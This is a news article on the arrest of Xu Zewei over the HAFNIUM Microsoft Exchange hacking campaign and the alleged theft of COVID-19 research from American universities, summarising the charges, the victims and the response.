In a significant cybersecurity breach, Chinese state-sponsored hackers have exploited vulnerabilities in Microsoft Exchange servers to steal critical COVID-19 research from American universities. This operation, orchestrated by the hacking group known as HAFNIUM, underscores the persistent threat posed by state-backed cyber espionage.
The Arrest of Xu Zewei
On July 3, 2025, Italian authorities arrested 33-year-old Chinese national Xu Zewei in Milan, following a U.S. extradition request. Xu faces a nine-count federal indictment, including charges of conspiracy to commit wire fraud, unauthorized access to protected computers, intentional damage to protected computers, and aggravated identity theft. If convicted on all counts, Xu could face up to 77 years in prison.
This arrest marks a significant milestone in the fight against state-sponsored cyber espionage, representing one of the first successful captures of hackers associated with Chinese intelligence services by the FBI.
The COVID-19 Research Theft Campaign
Between February 2020 and June 2021, Xu and his associates conducted a systematic campaign to steal critical COVID-19 research from American institutions. Operating under the direction of China’s Ministry of State Security (MSS) and its Shanghai State Security Bureau (SSSB), the hackers targeted U.S. universities, immunologists, and virologists engaged in developing vaccines, treatments, and testing protocols.
Court documents reveal that on February 19, 2020, Xu confirmed to his SSSB handler that he had successfully compromised the network of a research university in the Southern District of Texas. Three days later, the SSSB officer directed Xu to specifically target email accounts belonging to virologists and immunologists conducting COVID-19 research. Xu subsequently confirmed he had acquired the contents of these researchers’ mailboxes.
The HAFNIUM Campaign
The cyber espionage operation expanded dramatically in late 2020 when Xu and his co-conspirators began exploiting zero-day vulnerabilities in Microsoft Exchange Server. This massive campaign, publicly known as “HAFNIUM,” compromised thousands of computers worldwide. The attack leveraged four critical vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allowed attackers to gain persistent access to victim systems.
The HAFNIUM group successfully targeted over 60,000 U.S. entities, compromising more than 12,700 organizations. Victims included universities, law firms, defense contractors, and government agencies. The attackers installed web shells on compromised servers, providing them with remote access capabilities for data theft and lateral movement within networks.
The Microsoft Exchange Server exploitation campaign had unprecedented global reach. By March 2021, it was estimated that approximately 250,000 servers worldwide had fallen victim to the attacks. The European Banking Authority, Norwegian Parliament, and Chile’s Commission for the Financial Market were among the high-profile victims.
Microsoft released emergency security updates on March 2, 2021, but the damage was already extensive. The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued urgent advisories, urging organizations to apply patches immediately and to investigate potential compromises.
The Ongoing Threat
Despite the arrest of Xu Zewei, the threat from state-sponsored cyber espionage remains significant. The HAFNIUM campaign is a stark reminder of the vulnerabilities inherent in widely used software systems and the lengths to which nation-state actors will go to achieve their objectives.
Organizations are urged to maintain robust cybersecurity practices, including regular patching of software, monitoring for unusual activity, and educating employees about phishing and other common attack vectors.
The international community continues to grapple with the challenges posed by cyber espionage. The arrest of Xu Zewei is a step forward, but it also highlights the need for ongoing vigilance and cooperation among nations to combat these threats.
